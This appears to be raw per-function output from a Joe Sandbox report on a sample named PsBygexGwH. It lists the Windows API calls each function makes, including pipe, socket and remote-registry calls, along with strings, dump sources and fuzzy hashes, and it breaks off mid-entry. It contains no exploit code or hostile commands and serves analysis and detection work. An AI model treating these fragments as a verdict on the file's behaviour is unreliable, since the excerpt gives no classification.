                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 001905C6
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00190601
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CreateHandlePipe
                                                          • String ID: nul
                                                          • API String ID: 1424370930-2873401336
                                                          • Opcode ID: dadf52c813f0b5b9543026318bb78d30644b058b3dfa805713ca1aa774191904
                                                          • Instruction ID: 0a1881bce82654660384283f987574854d32376496904aba3074be8b8ec697e3
                                                          • Opcode Fuzzy Hash: dadf52c813f0b5b9543026318bb78d30644b058b3dfa805713ca1aa774191904
                                                          • Instruction Fuzzy Hash: 042174755003059FDF219F69DC04A9A77E8BF99734F200B19F8A1E72E0E77099A0CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0012600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0012604C
                                                            • Part of subcall function 0012600E: GetStockObject.GDI32(00000011), ref: 00126060
                                                            • Part of subcall function 0012600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0012606A
                                                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 001B4112
                                                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 001B411F
                                                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 001B412A
                                                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 001B4139
                                                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 001B4145
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CreateObjectStockWindow
                                                          • String ID: Msctls_Progress32
                                                          • API String ID: 1025951953-3636473452
                                                          • Opcode ID: ad6279d2b22c979827253ff6366bf092a32b05c11a1b480cb9dedc26476d2754
                                                          • Instruction ID: 17df6ac10dcb9dbeb9257bfda7c7148893843efdae67f113fa7112e0b9363be4
                                                          • Opcode Fuzzy Hash: ad6279d2b22c979827253ff6366bf092a32b05c11a1b480cb9dedc26476d2754
                                                          • Instruction Fuzzy Hash: E711B2B2150219BFEF119F64CC85EE77F5DEF18798F018111FA18A2190C7729C61DBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0015D7A3: _free.LIBCMT ref: 0015D7CC
                                                          • _free.LIBCMT ref: 0015D82D
                                                            • Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
                                                            • Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0
                                                          • _free.LIBCMT ref: 0015D838
                                                          • _free.LIBCMT ref: 0015D843
                                                          • _free.LIBCMT ref: 0015D897
                                                          • _free.LIBCMT ref: 0015D8A2
                                                          • _free.LIBCMT ref: 0015D8AD
                                                          • _free.LIBCMT ref: 0015D8B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                          • Instruction ID: 57dab20c191dc67da4e25a37c06dcb936870d57c6e2b1a25bce7aa4ba6dcf975
                                                          • Opcode Fuzzy Hash: 2933ec371357d85e0939af21d8d0365b0e51011a77ef7c4dc3c45f1a05a36567
                                                          • Instruction Fuzzy Hash: 1B118C32540B04EAD531BFF0DC06FCB7B9CAF29306F400824FAA9AE992CBB4A5094751
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0018DA74
                                                          • LoadStringW.USER32(00000000), ref: 0018DA7B
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0018DA91
                                                          • LoadStringW.USER32(00000000), ref: 0018DA98
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0018DADC
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 0018DAB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 4072794657-3128320259
                                                          • Opcode ID: 74f762a243490af3e21926f95c287bd2717c1ce74ff5ac60a253b49c4bec9b6c
                                                          • Instruction ID: faa68229d9e949691d7b8ccac6b11c3858ffae2a420edfa4155c95c3bd6bb719
                                                          • Opcode Fuzzy Hash: 74f762a243490af3e21926f95c287bd2717c1ce74ff5ac60a253b49c4bec9b6c
                                                          • Instruction Fuzzy Hash: 690112F6900208BFE711ABA4DD89EEB776CE708701F404595B746E2081EB749E848FB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedExchange.KERNEL32(0177EB30,0177EB30), ref: 0019097B
                                                          • EnterCriticalSection.KERNEL32(0177EB10,00000000), ref: 0019098D
                                                          • TerminateThread.KERNEL32(00000000,000001F6), ref: 0019099B
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 001909A9
                                                          • CloseHandle.KERNEL32(00000000), ref: 001909B8
                                                          • InterlockedExchange.KERNEL32(0177EB30,000001F6), ref: 001909C8
                                                          • LeaveCriticalSection.KERNEL32(0177EB10), ref: 001909CF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: c835c514177cc50cc7ce2607422284dc92e9930bb267ec9d467af6be985fdb38
                                                          • Instruction ID: cab14d2b4fae060308a52a955a0268ae03cabc2d764133c3271d08ad2a96f963
                                                          • Opcode Fuzzy Hash: c835c514177cc50cc7ce2607422284dc92e9930bb267ec9d467af6be985fdb38
                                                          • Instruction Fuzzy Hash: 16F0CD31442512ABDB565F94EE89AD67A25BF05706F401166F10150CA1C77598A5CFD0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 00125D30
                                                          • GetWindowRect.USER32(?,?), ref: 00125D71
                                                          • ScreenToClient.USER32(?,?), ref: 00125D99
                                                          • GetClientRect.USER32(?,?), ref: 00125ED7
                                                          • GetWindowRect.USER32(?,?), ref: 00125EF8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Rect$Client$Window$Screen
                                                          • String ID:
                                                          • API String ID: 1296646539-0
                                                          • Opcode ID: 341e629f54b1935e3dae4b6610810d3734ae3fa14c9c727c5a31a0fe40a22849
                                                          • Instruction ID: 69e8bf84840d925fef6984bab1eed63a50321d96e3826328f150e91e474d6a39
                                                          • Opcode Fuzzy Hash: 341e629f54b1935e3dae4b6610810d3734ae3fa14c9c727c5a31a0fe40a22849
                                                          • Instruction Fuzzy Hash: A0B17934A0065ADFDB14CFA9D8807EEB7F2FF58310F15851AE8A9D7250DB30AA61DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __allrem.LIBCMT ref: 001500BA
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 001500D6
                                                          • __allrem.LIBCMT ref: 001500ED
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0015010B
                                                          • __allrem.LIBCMT ref: 00150122
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00150140
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                          • String ID:
                                                          • API String ID: 1992179935-0
                                                          • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                          • Instruction ID: b40eda4b03e8d6a28786e632f58da71fc344d61cc1a40011fbf452a437e7aa3e
                                                          • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                                                          • Instruction Fuzzy Hash: 48813972A00B02DBD7259F68CC81B6B73E8AF55365F24413DF820DA7D1E7B0D9098750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 001A3149: select.WSOCK32(00000000,?,00000000,00000000,?), ref: 001A3195
                                                          • __WSAFDIsSet.WSOCK32(00000000,?), ref: 001A1DC0
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 001A1DE1
                                                          • WSAGetLastError.WSOCK32 ref: 001A1DF2
                                                          • inet_ntoa.WSOCK32(?), ref: 001A1E8C
                                                          • htons.WSOCK32(?), ref: 001A1EDB
                                                          • _strlen.LIBCMT ref: 001A1F35
                                                            • Part of subcall function 001839E8: _strlen.LIBCMT ref: 001839F2
                                                            • Part of subcall function 00126D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000002,?,?,?,?,0013CF58,?,?,?), ref: 00126DBA
                                                            • Part of subcall function 00126D9E: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,0013CF58,?,?,?), ref: 00126DED
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_strlen$ErrorLasthtonsinet_ntoaselect
                                                          • String ID:
                                                          • API String ID: 1923757996-0
                                                          • Opcode ID: 3f1231ec6bbcfb26b7a97a8110154c506a1eef032520cd99b6e12376540bf43e
                                                          • Instruction ID: ddb4e01e9db819443778273519f7e83e28a708da1c8ccce3de86515a41b9e697
                                                          • Opcode Fuzzy Hash: 3f1231ec6bbcfb26b7a97a8110154c506a1eef032520cd99b6e12376540bf43e
                                                          • Instruction Fuzzy Hash: 3BA10234504350AFC324DF24D885F2A7BE5AF95318F54894CF4569B2E2CB31EE4ACB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,001482D9,001482D9,?,?,?,0015644F,00000001,00000001,8BE85006), ref: 00156258
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0015644F,00000001,00000001,8BE85006,?,?,?), ref: 001562DE
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 001563D8
                                                          • __freea.LIBCMT ref: 001563E5
                                                            • Part of subcall function 00153820: RtlAllocateHeap.NTDLL(00000000,?,001F1444,?,0013FDF5,?,?,0012A976,00000010,001F1440,001213FC,?,001213C6,?,00121129), ref: 00153852
                                                          • __freea.LIBCMT ref: 001563EE
                                                          • __freea.LIBCMT ref: 00156413
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0
                                                          • Opcode ID: d217cd1eb6203953d932f455e532e4959d10dd7a8a8b5651314d9947ecde221a
                                                          • Instruction ID: 87e96ef55620a2d83e53f0d98fbbee2eb1d1db037751389ee352efaccf4e7d48
                                                          • Opcode Fuzzy Hash: d217cd1eb6203953d932f455e532e4959d10dd7a8a8b5651314d9947ecde221a
                                                          • Instruction Fuzzy Hash: F551BF72A00216EFEB258F64CC81EAF77A9EB54751F554629FC29DF140EB34DC48C6A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                            • Part of subcall function 001AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001AB6AE,?,?), ref: 001AC9B5
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001AC9F1
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA68
                                                            • Part of subcall function 001AC998: _wcslen.LIBCMT ref: 001ACA9E
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001ABCCA
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001ABD25
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 001ABD6A
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 001ABD99
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 001ABDF3
                                                          • RegCloseKey.ADVAPI32(?), ref: 001ABDFF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                          • String ID:
                                                          • API String ID: 1120388591-0
                                                          • Opcode ID: c767dda3b85c227fb28506d778ade3e32ea9c7f8784615ac730c15cbe6a8c668
                                                          • Instruction ID: 8341536acf91268060f8f16cddc38d8b9cba631a989c8e6590d549814f60b5de
                                                          • Opcode Fuzzy Hash: c767dda3b85c227fb28506d778ade3e32ea9c7f8784615ac730c15cbe6a8c668
                                                          • Instruction Fuzzy Hash: D4818C74208281AFD714DF64C8C5E2ABBE5FF85318F14896CF4598B2A2DB31ED45CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • VariantInit.OLEAUT32(00000035), ref: 0017F7B9
                                                          • SysAllocString.OLEAUT32(00000001), ref: 0017F860
                                                          • VariantCopy.OLEAUT32(0017FA64,00000000), ref: 0017F889
                                                          • VariantClear.OLEAUT32(0017FA64), ref: 0017F8AD
                                                          • VariantCopy.OLEAUT32(0017FA64,00000000), ref: 0017F8B1
                                                          • VariantClear.OLEAUT32(?), ref: 0017F8BB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                          • String ID:
                                                          • API String ID: 3859894641-0
                                                          • Opcode ID: ce0a69ad5b8375c9735c53c76db4ba454dbe3e55f698ee43a1302b97c0cd3de5
                                                          • Instruction ID: cfedb8f72cc8c04c0a89081cd2f6004f6c2115afa10e770ad2c978676e934d63
                                                          • Opcode Fuzzy Hash: ce0a69ad5b8375c9735c53c76db4ba454dbe3e55f698ee43a1302b97c0cd3de5
                                                          • Instruction Fuzzy Hash: 5451E431600310BACF24AB65D895B6AB3B8EF55314F24D46EF909EF291DB708D42C7A6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00127620: _wcslen.LIBCMT ref: 00127625
                                                            • Part of subcall function 00126B57: _wcslen.LIBCMT ref: 00126B6A
                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 001994E5
                                                          • _wcslen.LIBCMT ref: 00199506
                                                          • _wcslen.LIBCMT ref: 0019952D
                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 00199585
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _wcslen$FileName$OpenSave
                                                          • String ID: X
                                                          • API String ID: 83654149-3081909835
                                                          • Opcode ID: cb7fbcaa978dedd621f5328dfc16723848941c89a825f3bc0caf45fdabe467b6
                                                          • Instruction ID: da55a7e08f00c6100c65fd816ef369106d71d1818928fb0d6244aba59464a60b
                                                          • Opcode Fuzzy Hash: cb7fbcaa978dedd621f5328dfc16723848941c89a825f3bc0caf45fdabe467b6
                                                          • Instruction Fuzzy Hash: 17E1C4315083509FDB24DF28D481A6EB7E4BF94314F04896DF8899B2A2DB31DD05CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00139BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00139BB2
                                                          • BeginPaint.USER32(?,?,?), ref: 00139241
                                                          • GetWindowRect.USER32(?,?), ref: 001392A5
                                                          • ScreenToClient.USER32(?,?), ref: 001392C2
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001392D3
                                                          • EndPaint.USER32(?,?,?,?,?), ref: 00139321
                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001771EA
                                                            • Part of subcall function 00139339: BeginPath.GDI32(00000000), ref: 00139357
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                          • String ID:
                                                          • API String ID: 3050599898-0
                                                          • Opcode ID: f0344e99d15fc775a7debb7735edb75ae7639caaf0eb1c96c233e95b594e22d0
                                                          • Instruction ID: a3f1bbd2c272ca098544e23aa3209e2a43a0090a4f32de27bc03ef17c7caca88
                                                          • Opcode Fuzzy Hash: f0344e99d15fc775a7debb7735edb75ae7639caaf0eb1c96c233e95b594e22d0
                                                          • Instruction Fuzzy Hash: D6419D70104200EFD711DF24CC84FBA7BB8FB59724F140669F995972E1C7B19885DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 0019080C
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00190847
                                                          • EnterCriticalSection.KERNEL32(?), ref: 00190863
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 001908DC
                                                          • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 001908F3
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 00190921
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 3368777196-0
                                                          • Opcode ID: ad1fcac9c8d21d1a7aa1763c65883c5b8a1bf7eb797adc160dd75fa3518364aa
                                                          • Instruction ID: e35a9088823485ef451b2a77e48d4d9ea1a47153e9935bb7fe8c902636976fa4
                                                          • Opcode Fuzzy Hash: ad1fcac9c8d21d1a7aa1763c65883c5b8a1bf7eb797adc160dd75fa3518364aa
                                                          • Instruction Fuzzy Hash: F6415971A00205EFDF15AF54DC85AAA77B8FF08314F1440B9ED04AA297DB30DEA5DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0017F3AB,00000000,?,?,00000000,?,0017682C,00000004,00000000,00000000), ref: 001B824C
                                                          • EnableWindow.USER32(00000000,00000000), ref: 001B8272
